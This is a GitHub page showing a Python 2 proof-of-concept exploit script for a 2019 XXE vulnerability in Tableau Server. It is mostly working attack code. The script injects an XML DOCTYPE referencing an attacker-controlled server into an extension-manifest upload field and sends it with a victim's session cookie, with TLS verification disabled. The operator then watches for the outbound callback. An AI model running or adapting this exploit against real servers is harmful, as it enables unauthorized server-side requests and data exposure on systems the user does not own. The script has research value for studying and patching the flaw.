Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
exploits/TableauXXE.py /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
60 lines (52 sloc)
2.86 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #This comes from https://community.tableau.com/community/security-bulletins/blog/2019/08/22/important-adv-2019-030-xxe-vulnerability-in-tableau-products | |
| #Severity: High ====== CVSS3 Score: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L - 7.1 High ====== Product Specific Notes: Malicious workbooks, data sources, and extensions files that are published or used on Tableau Server can trigger this vulnerability | |
| #Unfortunately as I did not have access to the source code a lot of this couldn't really be coded. | |
| #Lot of this seems to be user specific (zoneid, dashboard etc). Virtually just taking the vulnerable request and running the exploit. | |
| #Very bare bones...wish I could've done more, but maybe someone else with access to the source would want to do that as an exercise. | |
| import requests | |
| import sys | |
| from warnings import filterwarnings | |
| # Globals | |
| proxy = 'http://127.0.0.1:8080' | |
| proxies = {'http':proxy, 'https':proxy} | |
| filterwarnings('ignore') | |
| def xxe(target, attackerserver, boundary, cookie, zoneid, dashboard): | |
| payload = """<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE root PUBLIC "-//A/B/EN" """ | |
| payload += "\""+attackerserver+"\"><svg xmlns:svg=\"http://www.w3.org/2000/svg\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" width=\"200\" height=\"200\"><text x=\"0\" y=\"20\" font-size=\"20\">test</text></svg>" | |
| headers = {'Content-Type': 'multipart/form-data; boundary='+boundary, 'Cookie': 'workgroup_session_id='+cookie} | |
| data = "--"+boundary+"\r\n" | |
| data += """Content-Disposition: form-data; name=\"zoneId\""""+"\r\n" | |
| data += "\r\n" | |
| #below will be different for each user - this is the zoneid of the dashboard you're exploiting this against | |
| data += zoneid+ "\r\n" | |
| data += "--"+boundary+"\r\n" | |
| data += """Content-Disposition: form-data; name=\"dashboard\""""+"\r\n" | |
| data += "\r\n" | |
| #below will be different for each user - the name of the dashboard we have access to which we're exploiting this against | |
| data += dashboard + "\r\n" | |
| data += "--"+boundary+"\r\n" | |
| data += """Content-Disposition: form-data; name=\"wasCanceled\""""+"\r\n" | |
| data += "\r\n" | |
| data += "false" | |
| data += "\r\n" | |
| data += "--"+boundary+"\r\n" | |
| data += """Content-Disposition: form-data; name=\"extensionManifestContents\""""+"\r\n" | |
| data += "\r\n" | |
| data += payload | |
| data += "\r\n" | |
| data += "--"+boundary+"--" | |
| r = requests.post(target, headers=headers, data=data, proxies=proxies, verify=False) | |
| def main(): | |
| if len(sys.argv) != 7: | |
| print "(+) usage: %s <target><attackerserver><boundary><workgroup_session_id_cookie><zoneid><dashboardname>" % sys.argv[0] | |
| sys.exit(-1) | |
| target = sys.argv[1] | |
| attackerserver = sys.argv[2] | |
| boundary = sys.argv[3] | |
| cookie = sys.argv[4] | |
| zoneid = sys.argv[5] | |
| dashboard = sys.argv[6] | |
| xxe(target,attackerserver,boundary,cookie,zoneid,dashboard) | |
| print "making request, make sure to catch the HTTP request!" | |
| if __name__ == "__main__": | |
| main() | |